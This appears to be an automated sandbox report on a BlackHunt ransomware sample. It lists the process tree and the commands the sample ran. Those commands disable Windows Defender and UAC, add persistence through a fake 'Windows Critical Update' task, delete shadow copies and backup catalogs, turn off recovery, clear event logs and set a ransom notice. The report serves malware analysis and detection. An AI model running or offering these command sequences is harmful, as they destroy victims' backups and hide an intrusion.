730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 119 PID 3384 wrote to memory of 1848 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 122 PID 3384 wrote to memory of 1848 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 122 PID 3888 wrote to memory of 4736 3888 cmd.exe 128 PID 3888 wrote to memory of 4736 3888 cmd.exe 128 PID 4512 wrote to memory of 4372 4512 cmd.exe 181 PID 4512 wrote to memory of 4372 4512 cmd.exe 181 PID 3384 wrote to memory of 3208 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 124 PID 3384 wrote to memory of 3208 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 124 PID 3200 wrote to memory of 3280 3200 cmd.exe 125 PID 3200 wrote to memory of 3280 3200 cmd.exe 125 PID 3384 wrote to memory of 2952 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 129 PID 3384 wrote to memory of 2952 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 129 PID 3384 wrote to memory of 4476 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 131 PID 3384 wrote to memory of 4476 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 131 PID 3372 wrote to memory of 3288 3372 cmd.exe 190 PID 3372 wrote to memory of 3288 3372 cmd.exe 190 PID 4636 wrote to memory of 3356 4636 cmd.exe 135 PID 4636 wrote to memory of 3356 4636 cmd.exe 135 PID 3384 wrote to memory of 4416 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 136 PID 3384 wrote to memory of 4416 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 136 PID 1660 wrote to memory of 4044 1660 cmd.exe 192 PID 1660 wrote to memory of 4044 1660 cmd.exe 192 PID 3384 wrote to memory of 4568 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 139 PID 3384 wrote to memory of 4568 3384 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe 139 PID 1848 wrote to memory of 4460 1848 cmd.exe 140 PID 1848 wrote to memory of 4460 1848 cmd.exe 140 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe"C:\Users\Admin\AppData\Local\Temp\730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:3384 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:208 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1648
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4420 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵PID:4560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4256
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3804 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3524
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1012 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4616 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:4132
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:4736
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3372 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:3288
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:3200 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:3280
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:4372
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:3356
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:5008
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1352
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:1848 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:4460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:3208
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2952
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:4240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:4476
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:4072
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:4416
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:3080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:4568
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:4084
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:4972
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1800
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2776
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1568
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1460
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:2148
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:5012
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:440
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3808
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:4368
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵
- Suspicious use of WriteProcessMemory
PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3400
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4928
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵
- Modifies registry class
PID:4560 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:3720
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:4564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:3652
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe" /F2⤵PID:4912
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe" /F3⤵
- Creates scheduled task(s)
PID:4044
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2476
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:3944
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:4372
-
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:3980
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:4016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:2876
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:3296
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:7908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:3868
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:8056
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:3360
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:6832
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:4480
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:7016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:4524
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:8436
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:5020
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:6152
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:6420
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:6168
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:3176
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:9040
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:6532
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:3032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:6160
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:23284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:5132
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:23296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5688
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:23300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:6860
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:23268
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:16356
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:23100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:7504
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:23248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:6456
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:23212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:8724
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:19956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:22548
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:23188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:22660
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:22868
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:22664
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:19968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:22712
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:16484
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:22764
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:19900
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:23276
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:23340
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:23144
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:23412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:23072
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:23312
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:23044
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:23488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵
- Checks computer location settings
- Modifies registry class
PID:23000 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\ProgramData\#BlackHunt_ReadMe.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵PID:22864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 22864 -s 14604⤵
- Program crash
PID:6932
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:23116
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:23392
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\730dff0a623a60c6814d8d909f0db94ed912e681b14e6dd11c55643ec9643995.exe"2⤵PID:22984
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:23352
-
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:3288
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3068
-
